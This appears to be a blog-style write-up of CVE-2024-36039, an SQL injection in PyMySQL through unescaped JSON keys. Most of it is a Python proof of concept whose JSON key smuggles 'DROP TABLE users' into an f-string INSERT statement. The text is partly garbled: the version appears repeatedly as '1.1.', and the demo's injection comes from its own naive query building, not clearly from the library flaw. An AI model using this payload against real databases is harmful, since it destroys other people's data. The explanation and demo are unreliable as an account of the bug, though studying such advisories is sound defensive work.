CVE-2024-36039: SQL Injection in PyMySQL through 1.1. due to Unescaped Keys in JSON Input

In this long read, we'll be discussing the SQL injection vulnerability (CVE-2024-36039) present in PyMySQL through version 1.1., a popular MySQL database connector for Python. We will walk through the details of the exploit, provide a code snippet to demonstrate the issue, and link to original references for further understanding.

Exploit Details

The vulnerability exists when PyMySQL is used with untrusted JSON input. The keys in JSON input are not escaped properly by the escape_dict function, allowing an attacker to execute arbitrary SQL queries and potentially compromise the security and integrity of a database.

The root cause of this issue is the lack of proper sanitization of the keys in the JSON input while processing the data. This makes it possible for an attacker to inject malicious SQL code as part of the JSON key and execute unauthorized SQL commands against the database.

Here's a simple example of the exploit in action

import pymysql
import json

# Connect to the database
connection = pymysql.connect(
    host='localhost',
    user='testuser',
    password='testpassword',
    database='testdb'
)

# Malicious JSON input with SQL injection in the key
malicious_json = json.loads('{"name": "John Doe", "age": 30, "email": "test@example.com", "1=1;DROP TABLE users; -- ": ""}')

# Function to insert the JSON data into the database
def insert_data(data):
    with connection.cursor() as cursor:
        # Naive approach - Using escape_dict for escaping
        escaped_data = pymysql.escape_dict(data)
        keys = ', '.join(escaped_data.keys())
        values = ', '.join(escaped_data.values())
        sql = f"INSERT INTO users ({keys}) VALUES ({values})"
        cursor.execute(sql)
    connection.commit()

# Execute the function with the malicious JSON
insert_data(malicious_json)

# Close the connection
connection.close()

In the above code snippet, the malicious_json variable contains a JSON object with an injected SQL query that drops the users table. When the insert_data function is used to insert this JSON object into the database using PyMySQL, it fails to escape the keys properly, allowing the database to execute the injected SQL statement and delete the users table.

Original References

For more in-depth details on this vulnerability, including discussions on how this issue was discovered and possible mitigations, please refer to the following links:

1. PyMySQL GitHub Repository - Issue #1004
2. CVE-2024-36039 - Mitre's Common Vulnerabilities and Exposures

Conclusion

To protect your applications and databases from being affected by this SQL injection vulnerability, make sure to update PyMySQL to a version later than 1.1.. Additionally, always ensure you sanitize and validate all user inputs, especially when dealing with JSON. Finally, stay informed about vulnerabilities in the software and libraries you use by regularly checking for security patches and updates.

Timeline

Published on: 05/21/2024 16:15:26 UTC
Last modified on: 06/24/2024 07:15:15 UTC